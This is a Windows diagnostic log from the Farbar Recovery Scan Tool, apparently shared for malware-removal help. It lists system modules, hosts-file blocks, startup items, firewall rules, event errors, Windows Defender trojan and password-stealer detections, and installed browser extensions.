2019-02-14 02:42 - 2019-02-08 19:51 - 000097840 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keytar\build\Release\keytar.node
2019-02-14 02:42 - 2019-02-08 19:51 - 000219696 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\electron-ssid\build\Release\electron-ssid.node
2019-02-14 02:42 - 2019-02-08 19:51 - 000081768 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\desktop-idle\build\Release\desktopIdle.node
2019-01-15 01:28 - 2019-01-15 01:28 - 001042744 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2019-01-15 01:28 - 2019-01-15 01:28 - 000189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2018-05-16 02:59 - 2018-05-16 02:59 - 000076088 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2018-04-12 18:06 - 2019-02-08 19:51 - 002901504 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll
2018-04-12 18:06 - 2019-02-08 19:51 - 000015360 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll
2019-02-14 02:42 - 2019-02-08 19:51 - 000405056 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\@paulcbetts\spellchecker\build\Release\spellchecker.node
2019-02-14 02:42 - 2019-02-08 19:51 - 000138816 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keyboard-layout\build\Release\keyboard-layout-manager.node
2019-02-14 02:42 - 2019-02-08 19:52 - 003257192 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\Processing.NDI.Lib.x86.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\38318503.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\38318503.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\localhost -> localhost

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 14:25 - 2019-02-05 00:52 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts

127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 texttotalk.org
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 technologievimy.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Stanley\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img4.jpg
DNS Servers: 192.168.8.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TenorshareWinAdService => 2
MSCONFIG\Services: WsAppService => 2
MSCONFIG\startupreg: utweb => "C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe" /MINIMIZED
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "utweb"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "IncrediMail"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "RIMDeviceManager"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "QTWQA7PTCRBGCEE"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{27AB2084-96CC-423D-8AE7-D0AC93666081}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [UDP Query User{3AF93F33-8A51-4215-BC5E-F4DB7A8EEE52}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{50B50355-5350-4725-BD33-5A7C6482C01A}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E18A37C3-3221-4F6B-9241-67BE79FCF0DC}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{07B5D44D-4E10-43B2-9078-1C393459622F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe No File
FirewallRules: [{667D3D91-E5EA-4EA3-9A3C-5C2F77E71A0D}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe No File
FirewallRules: [{0CF852DE-F4B5-441D-95F8-130531A3076F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe No File
FirewallRules: [{0513F420-E8DE-4C74-BAF0-F3CFF66CE5C6}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe No File
FirewallRules: [{6DDFF7C5-16FF-49FF-95F9-472442614287}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{255BD4B5-55AB-4A04-AF01-2ECA95F1F335}] => (Allow) C:\Program Files\Opera\58.0.3135.65\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [TCP Query User{DD2AF73D-267B-418A-A0F5-05DD5ED97831}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [UDP Query User{A7B50CA7-7E26-4E38-BC39-4332936FB3E2}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)

==================== Restore Points =========================

30-01-2019 08:42:13 Scheduled Checkpoint
07-02-2019 07:32:46 Scheduled Checkpoint
14-02-2019 03:01:16 Removed IncrediMail.
14-02-2019 23:59:09 Restore Point Created by FRST
16-02-2019 07:50:46 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (02/17/2019 12:43:31 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program FRST64.exe version 13.2.2019.1 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1cb8

Start Time: 01d4c6b5f947de37

Termination Time: 30

Application Path: C:\Users\Stanley\Downloads\FRST\FRST64.exe

Report Id: 3b0a8a57-32a9-11e9-8280-402cf4d8539a

Faulting package full name: 

Faulting package-relative application ID:

Error: (02/17/2019 09:05:42 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/17/2019 09:05:37 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/17/2019 09:05:05 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/17/2019 01:04:23 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/16/2019 09:48:51 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/16/2019 08:55:56 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/16/2019 08:36:40 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable


System errors:
=============
Error: (02/16/2019 09:01:30 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.

Error: (02/16/2019 09:00:39 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The OpenVPN Legacy Service service terminated with the following error: 
The process cannot access the file because it is being used by another process.

Error: (02/16/2019 09:00:37 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UC Browser Service service failed to start due to the following error: 
The system cannot find the file specified.

Error: (02/16/2019 08:33:34 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.

Error: (02/16/2019 08:32:43 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The OpenVPN Legacy Service service terminated with the following error: 
The process cannot access the file because it is being used by another process.

Error: (02/16/2019 08:32:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UC Browser Service service failed to start due to the following error: 
The system cannot find the file specified.

Error: (02/16/2019 07:38:07 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.

Error: (02/16/2019 07:37:13 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The OpenVPN Legacy Service service terminated with the following error: 
The process cannot access the file because it is being used by another process.


Windows Defender:
===================================
Date: 2019-02-15 01:30:44.644
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {33A0CEFD-234D-475F-8ADE-5D3D11D9E85A}
Scan Type: Antimalware
Scan Parameters: Full Scan

Date: 2019-02-14 03:37:29.427
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {37ABE826-5D4C-4627-8D24-955304B7A07C}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2019-02-13 23:30:12.489
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0
Name: Trojan:Win32/Fuerboos.C!cl
ID: 2147723654
Severity: Severe
Category: Trojan
Path: file:_C:\Users\Stanley\AppData\Local\Dingbam.tst
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: User
Process Name: Unknown
Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0

Date: 2019-02-13 23:30:12.489
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bitrep.A&threatid=2147723097&enterprise=0
Name: Trojan:Win32/Bitrep.A
ID: 2147723097
Severity: Severe
Category: Trojan
Path: file:_C:\Users\Stanley\AppData\Local\IM\Identities\{A156883C-4811-474F-ACCE-796599B8B822}\Message Store\Messages\4\{E94F6B5A-2129-4595-A27B-FBAABD7D5EE2}\Attachments\Order_009.pdf
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: User
Process Name: Unknown
Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0

Date: 2019-02-13 23:30:12.489
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=SoftwareBundler:Win32/Prepscram&threatid=226289&enterprise=0
Name: SoftwareBundler:Win32/Prepscram
ID: 226289
Severity: High
Category: Software Bundler
Path: containerfile:_C:\Users\Stanley\Downloads\Programs\BG-HUNTING SERBIA.txt;file:_C:\Users\Stanley\Downloads\Programs\BG-HUNTING SERBIA.txt->setup.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: User
Process Name: Unknown
Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0

Date: 2019-02-13 16:10:19.791
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80070424
Error description: The specified service does not exist as an installed service. 

Date: 2019-02-13 16:02:00.333
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80072ee2
Error description: The operation timed out 

Date: 2019-02-13 16:02:00.333
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80072ee2
Error description: The operation timed out 

Date: 2019-02-13 15:59:52.285
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80070424
Error description: The specified service does not exist as an installed service. 

Date: 2018-05-29 09:02:21.940
Description: 
Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0
Name: PWS:Win32/Dyzap.X
ID: 2147717189
Severity: Severe
Category: Password Stealer
Path: process:_pid:5952,ProcessStart:131720254146746317
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\Stanley\AppData\Local\Temp\~AceTemp\APPROVED_DOCUMENTS_2018_PDF\APPROVED DOCUMENTS 2018_PDF.exe
Action: Quarantine
Action Status:  To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. 
To finish removing malware and other potentially unwanted software, restart the computer. 
Error Code: 0x8007054f
Error description: An internal error occurred. 
Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0

CodeIntegrity:
===================================

Date: 2018-12-23 07:19:51.102
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:49.365
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:47.582
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:45.686
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i5-2540M CPU @ 2.60GHz
Percentage of memory in use: 47%
Total physical RAM: 4006.35 MB
Available physical RAM: 2102.2 MB
Total Virtual: 7974.35 MB
Available Virtual: 5486.83 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:297.75 GB) (Free:65.57 GB) NTFS

\\?\Volume{4756afb4-4eee-11e8-824f-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.09 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 2DDE751F)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


NEW FRST.TXT

FireFox:
========
FF ProfilePath: C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default [2019-02-15]
FF Extension: (Google Code Correction) - C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\features\{5b8c6255-56bd-4974-a055-17773a870acc}\google-code-correction@mozilla.org.xpi [2018-05-21] [Legacy]
FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7
FF Extension: (IDM integration) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7 [2018-09-23] [Legacy] [not signed]
FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5 [2019-02-16] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-19] ()
FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-19] ()
FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll [2015-05-22] ()
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.)

Chrome: 
=======
CHR DefaultProfile: Profile 3
CHR Session Restore: Profile 3 -> is enabled.
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default [2019-02-15]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2018-06-15]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2018-11-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-12]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-11-08]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-15]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-15]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-15]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-15]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-15]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-15]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-15]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-15]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-05-04]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-05-04]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-23]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-05-04]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-05-04]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-26]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-05-04]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-05-04]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2 [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-27]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-25]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-16]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3 [2019-02-18]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-07]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
